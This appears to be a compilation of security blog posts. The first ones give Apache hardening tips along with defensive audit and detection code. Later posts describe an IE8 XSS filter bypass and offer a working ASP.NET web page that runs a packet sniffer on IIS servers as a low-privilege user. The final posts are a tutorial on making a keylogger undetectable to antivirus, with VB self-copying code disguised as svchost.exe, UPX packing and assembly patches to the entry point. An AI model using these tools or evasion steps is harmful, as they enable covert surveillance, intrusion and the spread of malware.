Is your Apache in safe mode?

This post is a brief review of Apache security. It does not contain all the details, but I want to write all of them eventually.

When you decide to build a web server on an open source OS for web publishing, public or private, not all of its features are needed, and some of them must be changed carefully. We look at two cases of using Apache here:

Case 1: In some cases you need to build a simulated FTP server based on the HTTP protocol.

Case 2: You need to build a mail server with an HTTP interface, such as Horde or SquirrelMail.

So what changes are needed, and which features are usable for your job?

In a default installation of Apache, a very useful web server, on a wide range of open source operating systems you will see auto-indexing and directory browsing enabled. That is fine for an HTTP server acting as an FTP server, but is it usable for an HTTP mail server? Of course the answer is no. Why? It is simple.

In case 1 you only need to give your users permission to read files and browse directories, and deny them reading or browsing any other directory. In case 2 the server may share a complete configuration with case 1, but here you must use an interpreter for your scripts and language. So if directory browsing is not denied, what becomes possible? For example, an attacker can change directory upwards and see your most important data, such as the web server configuration or some log files, or a higher-level script kiddie could copy your password file somewhere. Now your web server is really crackable: an attacker can read your configuration and may change it!

What do you do? That is a good question.

1- You can change the permissions of all unneeded directories to deny other users and groups, like:

[user@host]# chmod -R 700 <directory you want to hide from others>

2- Change the permissions of your files so they are only readable by www and not executable, whether you serve HTML pages or script-based pages, with:

[user@host]# chmod 644 *.php
(and the same for other script types)
3- If your server pages are PHP, you can change the php.ini file a bit.

On my machine it is:

[user@host /usr/home/t4z3v4r3d]# cat /usr/local/etc/php.ini | grep basedir
; open_basedir, if set, limits all file operations to the defined directory
open_basedir = /usr/local/www
[user@host /usr/home/t4z3v4r3d]#

Set open_basedir = /usr/local/www, i.e. your www directory. This is one way of blocking some PHP shell scripts like c99.php, because PHP then refuses file operations outside that path.
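The three steps above can be checked mechanically. The following is an added example, not code from the original post: it audits httpd.conf and php.ini fragments for the two settings discussed here, directory listing (Options Indexes) and open_basedir. The config fragments are constructed for the demo, and the "Require all denied" line in the hardened fragment assumes Apache 2.4 authorization syntax (2.2 used Order/Deny).

```python
"""Config audit for the two hardening points above: directory listing
(Options Indexes) and PHP's open_basedir. Added example, not part of the
original post; the httpd.conf and php.ini fragments are constructed."""
import re

# Constructed: permissive vhost (listing on, no open_basedir) ...
WEAK_HTTPD_CONF = """
DocumentRoot "/usr/local/www"
<Directory "/usr/local/www">
    Options Indexes FollowSymLinks
    AllowOverride All
</Directory>
"""

# ... beside the hardened version. "Require all denied" is Apache 2.4
# syntax (assumption about the reader's version; 2.2 uses Order/Deny).
HARDENED_HTTPD_CONF = """
DocumentRoot "/usr/local/www"
<Directory "/usr/local/www">
    Options -Indexes +FollowSymLinks
    AllowOverride None
</Directory>
<Directory "/usr/local/www/mail/config">
    Require all denied
</Directory>
"""

WEAK_PHP_INI = """
; open_basedir not set: scripts may touch any file the www user can read
"""

HARDENED_PHP_INI = """
; open_basedir, if set, limits all file operations to the defined directory
open_basedir = /usr/local/www
"""

LISTING_ON = {"indexes", "+indexes", "all", "+all"}


def listing_enabled_dirs(httpd_conf):
    """Paths of <Directory> blocks (or '(global)') whose Options line turns
    directory listing on. 'Indexes', '+Indexes' and 'All' enable it;
    '-Indexes' and 'None' do not."""
    enabled = []
    current = None
    for line in httpd_conf.splitlines():
        stripped = line.strip()
        opening = re.match(r'<Directory\s+"?([^">]+)"?\s*>', stripped, re.I)
        if opening:
            current = opening.group(1)
            continue
        if stripped.lower() == "</directory>":
            current = None
            continue
        if stripped.lower().startswith("options"):
            tokens = {t.lower() for t in stripped.split()[1:]}
            if tokens & LISTING_ON:
                enabled.append(current or "(global)")
    return enabled


def open_basedir_value(php_ini):
    """Uncommented open_basedir value, or None when the directive is absent."""
    for line in php_ini.splitlines():
        stripped = line.strip()
        if stripped.startswith(";") or "=" not in stripped:
            continue
        key, _, value = stripped.partition("=")
        if key.strip() == "open_basedir":
            return value.strip()
    return None


def audit(httpd_conf, php_ini):
    """Findings as short strings; an empty list means both checks pass."""
    findings = [f"directory listing enabled for {d}"
                for d in listing_enabled_dirs(httpd_conf)]
    if open_basedir_value(php_ini) is None:
        findings.append("open_basedir not set in php.ini")
    return findings


if __name__ == "__main__":
    print("weak:", audit(WEAK_HTTPD_CONF, WEAK_PHP_INI))
    print("hardened:", audit(HARDENED_HTTPD_CONF, HARDENED_PHP_INI))
```

Run it against your own files by reading them into the two arguments; the weak fragment produces two findings and the hardened one produces none. Note that open_basedir only restricts PHP's own file functions, so it complements, rather than replaces, the filesystem permissions from steps 1 and 2.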

What can PHP shells do?


Hi, this is the second part of Apache security.
We want to look at how to secure all of our scripts when we host several sites.
On shared servers (commercial hosting) we can secure our server with applications such as cPanel, Plesk and so on.
But how can we secure it by hand? Of course it is not so simple, but it is not hard to do.
OK, let's see what we can do. Let's look at this how-to from the attacker's side.
Any attacker wants to gather some information before making a successful attack on a server.
But what information exactly? Yes, any information; all information may help the attacker get into your server.
The kind of web server, the web server version, the OS type and version, the modules your web server is running, the server admin's mail, the DNS server, and so on, are good information for starting an attack.

Some of this information cannot be hidden, but some of it can!
OK, we can change our server's operating system name and the web server's name, type and version with some tools and mods (coming soon).

All attack methods depend on the security of your server.

OK, we have made some changes in our Apache configuration.
But is it enough? Put another way: what is the set of security settings for Apache? Security is made up of many small, often invisible, details. You cannot stop web visitors from looking at your web content within a short period of time (you cannot tell users: browse my content only once), but you can stop them from browsing the whole site within a short period of time, or from attacks such as directory traversal or denial of service. Such an attack can consume a large amount of server resources; you can detect this attack and ban the attacker. Apache is now developed as a set of modules, so we can select the modules we need for protection.
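Detecting the two behaviours just mentioned, whole-site crawling in a short window and directory traversal probes, is a log problem. The following is an added example, not from the original post: it parses Apache combined-format access log lines, flags clients that exceed a request limit inside a sliding time window, and flags traversal attempts after percent-decoding the path. The log lines are constructed, and the 60-second/20-request thresholds are assumptions to tune per site.

```python
"""Detection over Apache access-log lines for the two behaviours the post
says you can detect and ban: directory traversal probes and one client
crawling the whole site in a short window (DoS-like bursts). Added example,
not from the original post. The log lines are constructed in Apache's
combined format, and the window/limit thresholds are assumptions to tune."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: a normal visitor, a traversal probe, and a client
# fetching 30 pages inside one minute.
SAMPLE_LOG = (
    '203.0.113.5 - - [10/Oct/2009:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326\n'
    '203.0.113.5 - - [10/Oct/2009:13:56:10 +0000] "GET /about.html HTTP/1.1" 200 1843\n'
    '198.51.100.7 - - [10/Oct/2009:13:55:40 +0000] "GET /mail/../../../etc/passwd HTTP/1.1" 404 209\n'
    '198.51.100.7 - - [10/Oct/2009:13:55:41 +0000] "GET /%2e%2e/%2e%2e/usr/local/etc/php.ini HTTP/1.1" 404 209\n'
    + "".join(
        f'192.0.2.9 - - [10/Oct/2009:13:57:{s:02d} +0000] "GET /page{s}.html HTTP/1.1" 200 512\n'
        for s in range(0, 60, 2)
    )
)


def parse_line(line):
    """One combined-format line -> dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def is_traversal(path):
    """Percent-decode twice (catches %252e) and look for a '..' segment,
    treating backslashes as separators as well."""
    decoded = unquote(unquote(path)).replace("\\", "/")
    return ".." in decoded.split("/")


def find_bursts(entries, window=timedelta(seconds=60), limit=20):
    """IPs with more than `limit` requests inside any `window`, using a
    sliding window over each client's sorted timestamps."""
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["ip"]].append(e["ts"])
    flagged = set()
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            if end - start + 1 > limit:
                flagged.add(ip)
                break
    return flagged


def analyze(log_text, window=timedelta(seconds=60), limit=20):
    """Return {'traversal': set of IPs, 'burst': set of IPs} for ban decisions."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    return {
        "traversal": {e["ip"] for e in entries if is_traversal(e["path"])},
        "burst": find_bursts(entries, window, limit),
    }


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

The traversal check decodes the path before looking for ".." because the web server logs the request as sent, so an encoded probe would otherwise slip past a plain string match. The burst detector is per client and window-based rather than a flat count, so a steady visitor over an hour is not confused with a thirty-requests-a-minute crawler; the sets it returns are what you would feed to a firewall or a ban list.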
Modules may be helpful tools if you have enough information about how each module works. Apache has three release lines, 1.3.x, 2.0.x and 2.x, and all of these versions can use modules.
For any platform you want to work on you may need some changes in configuration, giving resources to the web server, changing firewall rules, and so on. But you are the module selector and you are the lord of the Apache world. Deciding which modules are needed is your job, and tuning Apache is your art.
That is the end of section one for now, because I have no time to continue. I'll be back very soon. I want to build an HTTP server on my BSD box; all of these notes are real. In the next section we look at the details.

Internet Explorer 8 XSS filter bypassing

IE8 is Microsoft's new browser, with complete CSS 2.1 support, HTML5 support, built-in developer tools and so on. IE8 also makes a very big improvement in browser security: its built-in XSS Filter gives relatively good protection against non-persistent (reflected) cross-site scripting attacks. However, while testing IE8, 80sec found that the XSS Filter has a vulnerability, so that some East Asian-language versions simply cannot stop URL-based XSS; for example, on the Persian version some simple data can bypass IE8's filtering strategy.

Vulnerability analysis: The IE8 XSS Filter uses the system's built-in encoding when it filters; on the Persian version that is gb2312, and other East Asian locales use their own wide-byte encoding. A submitted non-encoded sequence such as %c1< is therefore treated by IE8 as a single normal wide character when it matches its filter keywords. But when the page is displayed, because the page declares a UTF-8 encoding, %c1< is not a valid UTF-8 sequence at parse time and is treated as two characters, so the < escapes the check. This inconsistency is what forms the vulnerability.
The vulnerability: assume there is a web script:


<?php
header("Content-Type: text/html; charset=utf-8");
echo $_GET['c'];   // reflected without escaping: the page relies on the browser filter
?>

On an IE8 system in an East Asian locale, if you try a conventional XSS such as:

.php?c=<script>alert()</script>

IE8's security strategy will block it, but if the
the code can bypass the IE8 XSS filter and be executed.

Vulnerability status: this vulnerability has been reported to Microsoft (by a Chinese hacker) and is awaiting a response.
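The root cause above is a mismatch between the encoding the filter assumes and the encoding the page declares, so the server-side fix is to stop relying on the browser filter at all. The following is an added example, not from 80sec's advisory or the original post: it reimplements the echo script's behaviour in Python beside a hardened version that decodes the raw query value strictly as the declared charset (UTF-8), rejecting an invalid sequence such as the bytes C1 3C instead of reinterpreting it, and HTML-escapes the result before echoing it.

```python
"""Server-side fix for the echo script above. The browser filter is only a
second line of defence; the page itself must neutralise untrusted input.
Added example, not from 80sec's advisory or the original post: the raw
query value is decoded strictly as the charset the page declares (UTF-8),
so an invalid sequence such as the bytes C1 3C is rejected instead of being
reinterpreted, and the result is HTML-escaped before it is echoed."""
import html
from urllib.parse import unquote_to_bytes

CHARSET = "utf-8"
PAGE = '<!DOCTYPE html><html><head><meta charset="{cs}"></head><body>{body}</body></html>'


def render_echo(raw_query_value):
    """The PHP script's behaviour in Python: lenient decoding, no escaping.
    Bytes that are not valid UTF-8 become U+FFFD and a following '<' survives."""
    text = unquote_to_bytes(raw_query_value).decode(CHARSET, errors="replace")
    return PAGE.format(cs=CHARSET, body=text)


def render_safe(raw_query_value):
    """Return (status, html). 400 on invalid UTF-8; otherwise the value is
    escaped so '<', '>', '&' and quotes cannot start markup."""
    try:
        text = unquote_to_bytes(raw_query_value).decode(CHARSET, errors="strict")
    except UnicodeDecodeError:
        return 400, PAGE.format(cs=CHARSET, body="bad request: invalid UTF-8 in parameter")
    return 200, PAGE.format(cs=CHARSET, body=html.escape(text, quote=True))


if __name__ == "__main__":
    for value in ("%3Cscript%3Ealert()%3C/script%3E", "%c1%3C", "hello"):
        print(value, "->", render_safe(value))
```

Escaping on output is what actually closes the hole; the strict decode is an extra check that makes the server's view of the bytes and the browser's view agree, which is exactly the agreement the filter bypass exploits. In PHP the equivalent pair is htmlspecialchars() with ENT_QUOTES and the UTF-8 charset argument, plus mb_check_encoding() on the input.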

Bug in WinPcap


I feel God is here.

Hi dear, I'm Daphne. My job is penetration tester (pen-tester), and I write about this subject and around it.

Pen-testing is a cool and fun job, with hacking as an interesting subject.

Anyway...

I use WinPcap 4.2 (the latest version).

http://www.winpcap.org/install/default.htm

What is WinPcap:

WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.

WinPcap consists of a driver, that extends the operating system to provide low-level network access, and a library that is used to easily access the low-level network layers. This library also contains the Windows version of the well known libpcap Unix API.

How to load WinPcap in Windows:

BUG:

When an Administrator or other power user in Windows summons the WinPcap driver (through Wireshark, Nmap, Cain or similar), the driver is loaded!

But when the program is closed, the WinPcap driver is still in memory. That's it.

When the driver is not unloaded, a Guest user or the IIS user can load this driver at kernel level and sniff the administrator's packets at administrator level, or get administrator privileges.
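The condition described above (the driver still resident after the capture tool exits) can be checked and remediated from an administrator's side. The following is an added example, not from the original post: it parses the output of the Windows `sc query` command for WinPcap's packet driver service, which is named NPF, reports whether the kernel driver is still in the RUNNING state, and names the command that unloads it. The sample `sc query` text is constructed from that command's usual layout so the parser runs on any platform; the live query only runs on Windows.

```python
"""Check whether the WinPcap packet driver (Windows service name NPF) is
still running after the capture tool has exited, which is the condition
the post describes. Added example, not from the original post:
parse_sc_query() reads the output of the Windows `sc query` command, the
sample text is constructed from that command's usual layout so the parser
runs anywhere, and npf_query_output() runs the real command on Windows only."""
import platform
import re
import subprocess

DRIVER_SERVICE = "NPF"

# Constructed sample of `sc query NPF` output with the driver left loaded.
SAMPLE_RUNNING = """
SERVICE_NAME: NPF
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
"""

# Same service after `sc stop NPF` (constructed).
SAMPLE_STOPPED = """
SERVICE_NAME: NPF
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
"""

FIELD_RE = re.compile(r"^\s*(TYPE|STATE)\s*:\s*\d+\s+(\S+)")


def parse_sc_query(text):
    """{'type': ..., 'state': ...} from `sc query` output, None if absent."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1).lower()] = m.group(2)
    return fields or None


def driver_left_loaded(sc_output):
    """True when the service block shows a kernel driver in RUNNING state."""
    parsed = parse_sc_query(sc_output)
    return (bool(parsed)
            and parsed.get("type") == "KERNEL_DRIVER"
            and parsed.get("state") == "RUNNING")


def npf_query_output():
    """Raw `sc query NPF` output on Windows; None on other platforms."""
    if platform.system() != "Windows":
        return None
    proc = subprocess.run(["sc", "query", DRIVER_SERVICE],
                          capture_output=True, text=True)
    return proc.stdout


def unload_command():
    """Administrator command that unloads the driver once no capture tool
    needs it (run from an elevated prompt)."""
    return f"sc stop {DRIVER_SERVICE}"


if __name__ == "__main__":
    raw = npf_query_output()
    if raw is None:
        print("not Windows; sample output flagged:", driver_left_loaded(SAMPLE_RUNNING))
    elif driver_left_loaded(raw):
        print("NPF driver still loaded; run:", unload_command())
    else:
        print("NPF driver not running")
```

A scheduled run of this check after capture sessions, or simply stopping the service when the analyst is done, removes the window the post describes; the WinPcap installer's option to start the driver automatically at boot is the other setting to review, since it keeps the driver loaded permanently.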

I sniffed packets with WinDump in guest mode.
http://www.winpcap.org/windump/install/default.htm

OK, I wrote this little tool for IIS7 and IIS6 on Windows 2003 and 2008:

Usage:

Load Wireshark or another tool that runs the WinPcap driver.

Rename windump.exe to packet.exe, upload it next to winpcap.aspx and run it.

Then you can see the sniffed packets in 1.txt.

winpcap.aspx

<%@ Page Language=”VB” Debug=”true” %>
<%@ import Namespace=”system.IO” %>
<%@ import Namespace=”System.Diagnostics” %>
<script runat=”server”>
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
‘ Change Path Of tcpdump
Dim myProcessStartInfo As New ProcessStartInfo(Server.MapPath(”packet.exe”))
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,”<”,”&lt;”)
mystring=replace(mystring,”>”,”&gt;”)
result.text= vbcrlf & “<pre>” & mystring & “</pre>”
End Sub</script>
<form runat=”server”>
New Method Of Packet Sniffing In web whith Public Accesss .
<br />
This Program Run is AS IS !
<strong><span class=”style-2″>Serve rip</span></strong> :<span class=”style-2″>  <%=request.ServerVariables(”LOCAL_ADDR”)%></span><br>
<strong><span class=”style-2″>Machine Name</span></strong> :<span class=”style-2″> <%=Environment.MachineName%></span><br>
<strong><span class=”style-2″>Network Name</span></strong> :<span class=”style-2″> <%=Environment.UserDomainName.ToString()%></span><br>
<strong><span class=”style-2″>User Name</span></strong> :<span class=”style-2″> <%=Environment.UserName%></span> <br>
<strong><span class=”style-2″>OS Version</span></strong> :<span class=”style-2″> <%=Environment.OSVersion.ToString()%></span><br>
<strong><span class=”style-2″>IIS Version</span></strong> :<span class=”style-2″> <%=request.ServerVariables(”SERVER_SOFTWARE”)%></span><br>
<strong><span class=”style-2″>HTTPS</span></strong> <span class=”style-2″>: <%=request.ServerVariables(”HTTPS”)%></span><br>
</tr>
<br />
Tested On Windows vista , IIS7 .
<br />
<h5>Discover By “DAPHNE IDEA SECURITY ” .</h5>
<br />
Exp: -i 6 -w “c:\windows\temp\packet.txt”
<hr />
<asp:Label id=”L_p” style=”COLOR: #0000ff” runat=”server” width=”80px”>TCP DUMP PATH:</asp:Label>
<br />
<label><%=Server.MapPath(”packet.exe”)%></label>
</asp:TextBox>
<br />
<asp:Label id=”L_a” style=”COLOR: #0000ff” runat=”server” width=”80px”>Arguments</asp:Label>
<asp:TextBox id=”xcmd” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid” runat=”server” Width=”300px”>-D</asp:TextBox>
<br />
<br />
<asp:Button id=”Button” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #000000″ onclick=”runcmd” runat=”server” Width=”100px” Text=”DUMP PAcket”></asp:Button>
<p>
<asp:Label id=”result” style=”COLOR: #0000ff” runat=”server”></asp:Label>
</p>
</form>

This tool is a sample.

In the future I'll talk about privilege escalation in drivers with the Kartoffel tool. ;)

Undetect malware and viruses from antivirus

In the name of God
Hi, I'm MrXX and in this blog I want to talk about coding, reversing and more...

And please don't post shit comments on the index, because we are going to delete them.
And please don't spam us with noob questions, because nobody answers noobs.
And the last thing: sorry about the English, because I can't even speak English (I can only read it), by the way.

First, I want to talk about some reversing (I was tired and searching, and my mind wasn't working correctly).
This is not my tutorial, but I searched the web for 2 or 3 days to find the best way, and I think this is the best way (original tutorial by Kenny).

To make malware undetected by antivirus

First we need tools:
1- Hex editor: I use HIEW (not the 32-bit version)
2- PE Tools: I use PE Tools v1.5
3- UPX
4- What crackers call the BRAIN (I think I've got one, but I can't give it to you; go find yours) :)
If you don't know what those tools are and how to use them, I tell you: go f.u.c.k yourself and please don't read this.
OK, I read the magic word and dorooooororooooooo: oh my god, magic happens :), my f.u.c.k.ing malware is undetected, ha ha ha ha. I'm kidding, there is no magic, magic is just some shit; everything in this whole world has a logical reason (I don't believe in magic).
Making malware (trojan, rootkit, virus, ...) undetected has just a few ways, and if you like it I'll tell you all the possible ways to make our malware tools undetected, but I'll tell them one by one, and if I see some "kididi mididi thanks" in the comments I'll tell the next magic word.
Let's pull the chair close to your PC and get started.
I wrote my own keylogger many years ago, but the god DAMN antivirus knows my own private keylogger as the probably unknown NewHeur_PE virus.

And NOD wants to submit this to their database :(

Oh my god, how could this happen :) Don't worry about that, I'll tell you next time how you can bypass the stupid antivirus with some cryptography.
This time I want to make the binary file undetected (you can use this for all the binary malware you don't have the source of).
See the VirusTotal result: that's nasty.

And you will see that some antivirus detect the malware and some of them don't, because it is private.
Malware is detected because of some lines like:

Dim ModuleName As String, FileName As String, hInst As Long
ModuleName = String$(128, Chr$(0))
hInst = GetWindowWord(Me.hwnd, GWW_HINSTANCE)
ModuleName = Left$(ModuleName, GetModuleFileName(hInst, ModuleName, Len(ModuleName)))

If CheckPath(SystemDir + “svchost.exe”) = False Then
FileCopy ModuleName, SystemDir + “svchost.exe”
ShellExecute Me.hwnd, “open”, SystemDir + “svchost.exe”, vbNullString, vbNullString, SW_HIDE
End
End If

Or because of the use of these APIs:

Private Declare Function SetWindowsHookEx Lib “user32″ Alias “SetWindowsHookExA” (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib “user32″ (ByVal hHook As Long) As Long
And…

OK, later we encrypt those commands and use the API very cleverly to bypass the noob antivirus.
Oh, we talked so much; let's get back to the undetected part.
First we pack the file with UPX (do something else) and open our packed file with PE Tools.

Open the file and get some info about the entry point:

Entry Point: 0000AD20
Image Base: 00400000

Now we open the packed file with HIEW in disassemble mode and go to the entry point.
You will see some entry like this:

This is the entry that UPX made.
When we scroll down some lines we will see zero space; we use this for hexing our tool.
Place those codes into the zero space.
Use the edit F3/F2 commands.

push        00040AD20   <— push OEP
push        eax
pushfd                   <—for tricking AVP
pushad                    <—for tricking AVP
call       .000025154  <—– call for Ret 28h
retn 00028

The addresses depend on your system and are not static.

After that, save the progress
and again add 2 lines:

INC ECX  <— Counter up
Loop 000022D9

Save them again.
OK, our hexing is finished; now we must go and change our entry point to the new entry.
We open PE Tools again and change the entry point to the new value.

OEP = entry address - image base (400000)

New entry:0040AED9

After that we unpack the file with UPX and it must be undetected by AV.
This method is called: changing the entry point to make the malware undetected.
That's the nice way, but we have easier ways too, like packing the file, hexing the signature of the file, and...

In the next post I'll talk about ELF files and reversing.
Good Luck
MrXX

Bypass antivirus with string crypting

Yeah, as I said in the last post,

in this tutorial you will learn to bypass some of the stupid god DAMN antivirus with the string encrypt/decrypt trick.

DL Link

The next post will be: Undetect the malware from AV

Another start

Here is another info-sec blog by some security researchers. We are really busy these days in our small labs, but we hope we can have efficient results and update this blog with some interesting content. We are trying to update this blog every day, and we accept all of your criticism and comments.
